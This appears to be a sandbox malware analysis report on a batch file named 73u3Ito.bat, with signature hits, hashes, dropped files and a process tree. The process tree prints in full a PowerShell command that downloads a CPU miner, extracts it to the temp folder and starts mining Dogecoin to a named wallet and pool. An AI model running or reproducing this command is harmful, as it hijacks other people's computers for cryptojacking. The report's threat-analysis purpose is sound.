b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
146s
max time network
132s
platform
windows10-1703_x64
resource
win10-20231215-en
resource tags

arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
submitted
02-02-2024 18:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	3908	powershell.exe
4	3908	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3108	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3108	cpuminer-sse2.exe
3108	cpuminer-sse2.exe
3108	cpuminer-sse2.exe
3108	cpuminer-sse2.exe
3108	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3908	powershell.exe
3908	powershell.exe
3908	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3908	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 5020 wrote to memory of 3908	5020	cmd.exe	61
PID 5020 wrote to memory of 3908	5020	cmd.exe	61
PID 3908 wrote to memory of 3772	3908	powershell.exe	75
PID 3908 wrote to memory of 3772	3908	powershell.exe	75
PID 3772 wrote to memory of 3108	3772	cmd.exe	77
PID 3772 wrote to memory of 3108	3772	cmd.exe	77

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3908
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3772
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3108

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gdmxw0y5.ue1.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
384KB

MD5
eb8ea4d2595402528f73410e2c8651ed

SHA1
23abb385032a9317d00c826eb21e0fe6fc802c50

SHA256
fc3c5c1787c58c465ea47ab132afc59d209b1f7d319ae80a7913ed5c39157017

SHA512
7f4485a662859bdec898bb4f9675c8a834ab570ae7f4df2b6e95a9f5ab45f8fba612d04f0edfe22dc4bdcd3011af0536ed200731262056cd7bec332ce4b18573

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
2.1MB

MD5
27d1d615aacc511371c6349ec17f23cd

SHA1
da86b0ec2ee40aa81957cd689605f89007c36883

SHA256
574b4ecd441aa705b760bef41e6576172ac6340dfc7c475bbdbb434a71a5bc6f

SHA512
0b7806355b5d8a179841e7fbd1845c9d8521bb2cd761e81ee119cfd9c698cf2fa15d75c3207f7418440ae8454b830cfb0ea68aa197c191aca386d2c1afc95da4

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
102KB

MD5
8e0d0bfcd42c703614c11b4a84010c9a

SHA1
dd9c4047137634d388f85379725113d09e80ec0a

SHA256
cf82c5763516294db31cc215367abda1983d71517a73e8344f2a0e4e5e5d6f49

SHA512
10e4a19c6eb96ede340c7fb13c37116863b202fd0d430f78fb641de01bafdcefbdfbf60e694cb245a9245f91efe73a27a20df9eb66c2e7746eaa19ad5c4bcc87

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
320KB

MD5
e63bf5df87e2ea807dc353cc5aa9aab1

SHA1
69fc94bbebe878711cb133c3a1affb80c0bdecff

SHA256
2c9d6315f90367b959d3c32badd99bbc03eb808e4a46db72ccf2e81788b41533

SHA512
70f2b2a8a4c8ab23d81266cd23b75c27ced29a1eab8c80d95c57b595b10254b7229cc03b637716edbfad2a83827f2c557847b98d1de80256beec05c9512ee4bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
256KB

MD5
1d86b9560854472453237bcbaa2e253f

SHA1
5a03a7902d250377a3e9f746badcb696e2c98228

SHA256
1493703a430c68bdcedcb4078486daca39a02820199e7b72017c7b1af66e1c8d

SHA512
afbc3d7f8e06e41db25d666999f4d162af7054a66b17a651ac8a7f092f83580a067bfa2f558be65ace5966dffaa8735fe7a579e88bf42b34eaa3e72cdec96699

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
42KB

MD5
61da3dda4e5628888964b1af36f949ff

SHA1
ccab8f373c0a095beb3b59ffa677bac8946a5294

SHA256
9f815d0e501ab587cc87083f0cd6ce3f272b4181ef110f8f4bcc52162df64f7f

SHA512
9ad983ae20984ee6b46690573fbeda54071dac7ef71e01a016c4dcff68530ba21b3d7307fcd9a7ba7a53d283fa334d16647fbd5e5c3879d7540513648bfd5658

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
29KB

MD5
12d3c481e6d2e64b88405d79aee51d07

SHA1
57e8867684a21889f5800005da9f802b649cf6e4

SHA256
cb939ec4ec9f6a95e501550338bd3705b85cbd1db1964ea7db38edbf244838b6

SHA512
5b5be46bdf5f16c32e5c6ddec07f9d9549f468f1d58a885d81e7767a6bbf0a4c59652085d5bc66d481efaf0669445afedaed26d3b6f27cbe91e525c3b9ee0b07

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
2.0MB

MD5
bf65a65f077ffc1f17eb29e07abcc08a

SHA1
4f500b0fc9f2ff0dd2835d6138cd05d9da74ebb1

SHA256
c6a06f134f8f565208321d9246d01d937d68530343c5747a150b005133acca24

SHA512
c9a14c1da78080bbda11886f9516d75bae9a5fc9d7d9b93773fa8a9fb05214e5f7d939d00ec0083fd815dcd9fc08bde431e0d35ff5d8cb8d7ce7292b4c38da8e

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.6MB

MD5
574dc3a49bf08fb5a7c8b8d24ebe7fbc

SHA1
560b95df221911ae343c6d2ea7e7fe77f6e28ff6

SHA256
e37cf4dbc4b9289e5a127b90db7ad5856a313cde28204a6a002037f27b1964d1

SHA512
a9d0ba4de0147e05f086b0baac6357f3826a2f728e7f9321ff8ba88770e1a53e0ed96cbd05626bea5b3ceef554bcf2c16592b43561da70e0c6a11c96823fd915

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
14KB

MD5
57bc28e77ba7f02252d5d1c6ebeb7e33

SHA1
03d31966e052d14ff5f92d69ceacf8fc886e003c

SHA256
094b3dcb3308d87ee8c065d27dc1e0ee818c68d37312bdbc03af9c88f20914aa

SHA512
c11bdf493da9bac705cf4d31330ad4bfe2e93c5aa6c0812c47906645e441981880cd651ab20b53e0e9770053d8e3b5a7acdd515ec74f6e16a8c2cdccf49229d4

Download Submit
memory/3108-124-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3108-134-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3108-169-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3108-164-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3108-159-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3108-154-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3108-149-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3108-144-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3108-139-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3108-123-0x00000000010B0000-0x0000000002965000-memory.dmp

Filesize
24.7MB

Download
memory/3108-119-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3108-120-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3108-121-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3108-122-0x000000006F9F0000-0x000000006FA88000-memory.dmp

Filesize
608KB

Download
memory/3908-5-0x00007FFB1B120000-0x00007FFB1BB0C000-memory.dmp

Filesize
9.9MB

Download
memory/3908-4-0x000001D765490000-0x000001D7654B2000-memory.dmp

Filesize
136KB

Download
memory/3908-107-0x00007FFB1B120000-0x00007FFB1BB0C000-memory.dmp

Filesize
9.9MB

Download
memory/3908-6-0x000001D765450000-0x000001D765460000-memory.dmp

Filesize
64KB

Download
memory/3908-9-0x000001D765640000-0x000001D7656B6000-memory.dmp

Filesize
472KB

Download
memory/3908-24-0x000001D765450000-0x000001D765460000-memory.dmp

Filesize
64KB

Download
memory/3908-28-0x00007FFB1B120000-0x00007FFB1BB0C000-memory.dmp

Filesize
9.9MB

Download
memory/3908-37-0x000001D765450000-0x000001D765460000-memory.dmp

Filesize
64KB

Download
memory/3908-49-0x000001D765620000-0x000001D765632000-memory.dmp

Filesize
72KB

Download
memory/3908-62-0x000001D765480000-0x000001D76548A000-memory.dmp

Filesize
40KB

Download